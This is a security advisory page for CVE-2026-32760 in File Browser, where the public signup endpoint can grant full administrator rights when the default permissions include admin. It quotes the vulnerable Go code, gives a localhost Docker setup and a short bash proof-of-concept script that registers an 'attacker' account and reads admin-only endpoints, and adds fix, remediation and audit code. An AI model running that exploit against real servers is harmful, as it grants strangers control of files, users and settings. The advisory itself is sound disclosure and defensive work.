CVE-2026-32760: File Browser (filebrowser/filebrowser, shipped as the filebrowser/filebrowser Docker image)
Severity: CRITICAL
CVSS 3.1 vector (NVD): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description (NVD)
Summary
Any unauthenticated visitor can register a full administrator account when self-registration (signup = true) is enabled and the default user permissions have perm.admin = true. The signup handler blindly applies all default settings - including Perm.Admin - to the new user without any server-side guard that strips admin from self-registered accounts.
Details
Affected file: http/auth.go

Vulnerable code (signupHandler, http/auth.go):

    user := &users.User{
        Username: info.Username,
    }
    d.settings.Defaults.Apply(user) // copies Perm.Admin = true if set in defaults
    // NO guard: user.Perm.Admin is never cleared here

settings.UserDefaults.Apply (settings/defaults.go):

    func (d *UserDefaults) Apply(u *users.User) {
        u.Perm = d.Perm // copies the full Permissions struct, including the Admin field
        ...
    }

Settings API permits Admin in defaults (http/settings.go):

    var settingsPutHandler = withAdmin(func(_ http.ResponseWriter, r *http.Request, d *data) (int, error) {
        ...
        d.settings.Defaults = req.Defaults // an admin can set Defaults.Perm.Admin = true
        ...
    })

The signupHandler is supposed to create unprivileged accounts for new visitors. It contains no explicit user.Perm.Admin = false reset after Defaults.Apply. If an administrator (intentionally or accidentally) configures defaults.perm.admin = true and also enables signup, every account created through the public registration endpoint is an administrator with full control over all files, users, and server settings.
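The following is an added example written for this page in Go (the project's language); it is not File Browser's code and not the advisory author's PoC. The stand-in types and the functions newSelfRegisteredUserVulnerable, newSelfRegisteredUserFixed and validateSettings are assumed simplifications of users.User, settings.UserDefaults and the signup handler. It reproduces the quoted flow, then places beside it the missing server-side reset (user.Perm.Admin = false after Defaults.Apply) and a second, settings-layer check that refuses to persist the signup + defaults.perm.admin combination.

```go
package main

import "fmt"

// Minimal stand-ins for the File Browser types the advisory quotes
// (users.User, users.Permissions, settings.UserDefaults). These are
// assumed simplifications for this example, not the project's code.
type Permissions struct {
	Admin   bool
	Execute bool
	Create  bool
	Modify  bool
	Delete  bool
}

type User struct {
	Username string
	Perm     Permissions
}

type UserDefaults struct {
	Perm Permissions
}

// Apply mirrors the behaviour quoted from settings/defaults.go: the whole
// Permissions struct, Admin included, is copied onto the new user.
func (d *UserDefaults) Apply(u *User) {
	u.Perm = d.Perm
}

// Settings holds the two knobs whose combination creates the exposure.
type Settings struct {
	Signup   bool
	Defaults UserDefaults
}

// newSelfRegisteredUserVulnerable reproduces the quoted signupHandler logic:
// defaults are applied and nothing clears Admin afterwards.
func newSelfRegisteredUserVulnerable(s *Settings, username string) *User {
	u := &User{Username: username}
	s.Defaults.Apply(u)
	return u
}

// newSelfRegisteredUserFixed is the hardened form: defaults are still
// applied (execute, create, ... keep their configured values), but Admin is
// unconditionally cleared, so a public signup can never yield an admin.
func newSelfRegisteredUserFixed(s *Settings, username string) *User {
	u := &User{Username: username}
	s.Defaults.Apply(u)
	u.Perm.Admin = false // the reset the advisory says is missing
	return u
}

// validateSettings is an independent guard at the settings layer: refuse to
// persist a configuration in which public signup would hand out admin.
// Defence in depth only; the signup-time reset above must exist regardless.
func validateSettings(s *Settings) error {
	if s.Signup && s.Defaults.Perm.Admin {
		return fmt.Errorf("refusing settings: signup is enabled and defaults.perm.admin is true")
	}
	return nil
}

func main() {
	// Constructed configuration matching the advisory's demo setup.
	s := &Settings{
		Signup:   true,
		Defaults: UserDefaults{Perm: Permissions{Admin: true, Execute: true, Create: true}},
	}

	vuln := newSelfRegisteredUserVulnerable(s, "attacker")
	fixed := newSelfRegisteredUserFixed(s, "attacker")
	fmt.Printf("vulnerable handler: %s admin=%v\n", vuln.Username, vuln.Perm.Admin)
	fmt.Printf("fixed handler:      %s admin=%v execute=%v\n", fixed.Username, fixed.Perm.Admin, fixed.Perm.Execute)
	if err := validateSettings(s); err != nil {
		fmt.Println("settings guard:", err)
	}
}
```

The reset belongs in the signup path itself rather than only in settings validation: defaults can be changed by any future admin, imported from a backup, or set through a client that bypasses the check, and the public endpoint must stay safe in all of those cases.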
Demo Server Setup

# Start the release used for this demo (pinned tag, not "latest")
docker run -d --name fb-test \
  -p 8080:80 \
  -v /tmp/fb-data:/srv \
  filebrowser/filebrowser:v2.31.2

# Wait for startup, then log in as the default admin; /api/login returns the JWT as the raw response body
ADMIN_TOKEN=$(curl -s -X POST http://localhost:8080/api/login \
  -H 'Content-Type: application/json' \
  -d '{"username":"admin","password":"admin"}')

# Enable signup and make admin a default permission (the vulnerable combination)
curl -s -X PUT http://localhost:8080/api/settings \
  -H "X-Auth: $ADMIN_TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{
    "signup": true,
    "defaults": {
      "perm": {
        "admin": true,
        "execute": true,
        "create": true,
        "rename": true,
        "modify": true,
        "delete": true,
        "share": true,
        "download": true
      }
    }
  }'

PoC Exploit
#!/bin/bash
# poc_signup_admin.sh
# Demonstrates: unauthenticated signup → admin account
TARGET="http://localhost:8080"
echo "[*] Registering attacker account via public signup endpoint..."
STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
-X POST "$TARGET/api/signup" \
-H "Content-Type: application/json" \
-d '{"username":"attacker","password":"Attack3r!pass"}')
echo "[*] Signup response: HTTP $STATUS"
echo "[*] Logging in as newly created account..."
ATTACKER_TOKEN=$(curl -s -X POST "$TARGET/api/login" \
-H "Content-Type: application/json" \
-d '{"username":"attacker","password":"Attack3r!pass"}')
echo "[*] Fetching user list with attacker token (admin-only endpoint)..."
curl -s "$TARGET/api/users" \
-H "X-Auth: $ATTACKER_TOKEN" | python3 -m json.tool
echo ""
echo "[*] Verifying admin access by reading /api/settings..."
curl -s "$TARGET/api/settings" \
-H "X-Auth: $ATTACKER_TOKEN" | python3 -m json.tool

Expected output: The attacker's token successfully returns the full user list and the server settings, endpoints restricted to users with Perm.Admin = true. A token for a non-admin account is refused (HTTP 403) on both.
Impact
Any unauthenticated visitor who can reach POST /api/signup obtains a full admin account. From there, they can:
- List, read, modify, and delete every file on the server
- Create, modify, and delete all other users
- Change authentication method and server settings
- Execute arbitrary commands if command execution is enabled (enableExec = true)
Analysis (AI-generated)
Unauthenticated attackers can register administrator accounts in File Browser (filebrowser/filebrowser) when self-registration is enabled and the default user permissions include admin privileges, because the signup handler fails to strip admin permissions from self-registered accounts. Public exploit code exists for this vulnerability. …
Remediation (AI-generated)
Within 24 hours: disable self-registration (signup = false) immediately and audit all user accounts created since deployment for unauthorized administrators. Within 7 days: review and remove perm.admin = true from the default user permissions, implement mandatory approval workflows for administrator account creation, and conduct forensic analysis of access logs for unauthorized activity. …
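An audit check for the two remediation steps above (is the vulnerable combination active, and which accounts hold admin), as an added example written for this page in Go; it is not File Browser's code or the page's own tooling. The sample bodies are constructed to match the shapes the page shows for GET /api/settings and GET /api/users; the exact field set of real responses is assumed, and extra fields are ignored by the decoder. Audit and the expectedAdmins allowlist are names chosen here.

```go
package main

import (
	"encoding/json"
	"fmt"
	"sort"
)

// Constructed sample bodies, shaped like File Browser's GET /api/settings and
// GET /api/users responses as the page shows them. Real responses carry more
// fields; json.Unmarshal ignores anything the views below do not name.
const sampleSettings = `{
  "signup": true,
  "defaults": {"perm": {"admin": true, "execute": true, "create": true}}
}`

const sampleUsers = `[
  {"id": 1, "username": "admin",    "perm": {"admin": true}},
  {"id": 2, "username": "alice",    "perm": {"admin": false}},
  {"id": 3, "username": "attacker", "perm": {"admin": true}}
]`

// settingsView and userView pick out only the fields the audit needs.
type settingsView struct {
	Signup   bool `json:"signup"`
	Defaults struct {
		Perm struct {
			Admin bool `json:"admin"`
		} `json:"perm"`
	} `json:"defaults"`
}

type userView struct {
	Username string `json:"username"`
	Perm     struct {
		Admin bool `json:"admin"`
	} `json:"perm"`
}

// Report is what an operator acts on.
type Report struct {
	SignupEnabled bool
	DefaultAdmin  bool
	Exposed       bool     // signup && defaults.perm.admin: any visitor can self-register as admin
	Admins        []string // every account holding admin, sorted
	Unexpected    []string // admins absent from the allowlist: review or remove
}

// Audit evaluates the two settings that combine into the exposure and lists
// admin accounts, flagging those not in expectedAdmins. The combination may
// have been enabled and later disabled, so the account review matters even
// when Exposed is false at audit time.
func Audit(settingsJSON, usersJSON []byte, expectedAdmins []string) (Report, error) {
	var s settingsView
	if err := json.Unmarshal(settingsJSON, &s); err != nil {
		return Report{}, fmt.Errorf("decode settings: %w", err)
	}
	var users []userView
	if err := json.Unmarshal(usersJSON, &users); err != nil {
		return Report{}, fmt.Errorf("decode users: %w", err)
	}
	allow := make(map[string]bool, len(expectedAdmins))
	for _, name := range expectedAdmins {
		allow[name] = true
	}
	r := Report{SignupEnabled: s.Signup, DefaultAdmin: s.Defaults.Perm.Admin}
	r.Exposed = s.Signup && s.Defaults.Perm.Admin
	for _, u := range users {
		if !u.Perm.Admin {
			continue
		}
		r.Admins = append(r.Admins, u.Username)
		if !allow[u.Username] {
			r.Unexpected = append(r.Unexpected, u.Username)
		}
	}
	sort.Strings(r.Admins)
	sort.Strings(r.Unexpected)
	return r, nil
}

func main() {
	// In practice the two bodies come from
	//   curl -H "X-Auth: $ADMIN_TOKEN" "$TARGET/api/settings"
	//   curl -H "X-Auth: $ADMIN_TOKEN" "$TARGET/api/users"
	// saved to files; here the constructed samples stand in for them.
	r, err := Audit([]byte(sampleSettings), []byte(sampleUsers), []string{"admin"})
	if err != nil {
		panic(err)
	}
	fmt.Printf("signup=%v defaults.perm.admin=%v exposed=%v\n", r.SignupEnabled, r.DefaultAdmin, r.Exposed)
	fmt.Printf("admin accounts: %v\n", r.Admins)
	fmt.Printf("unexpected admins (review/remove): %v\n", r.Unexpected)
}
```

Run it with the saved settings and users bodies of each instance; an Exposed report means the fix order is disable signup first, then clear the admin default, then work through Unexpected, since removing an attacker's admin flag while signup still hands out new ones gains nothing.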
References
GHSA-5gg9-5g7w-hm73 (external advisory with PoC / exploit code)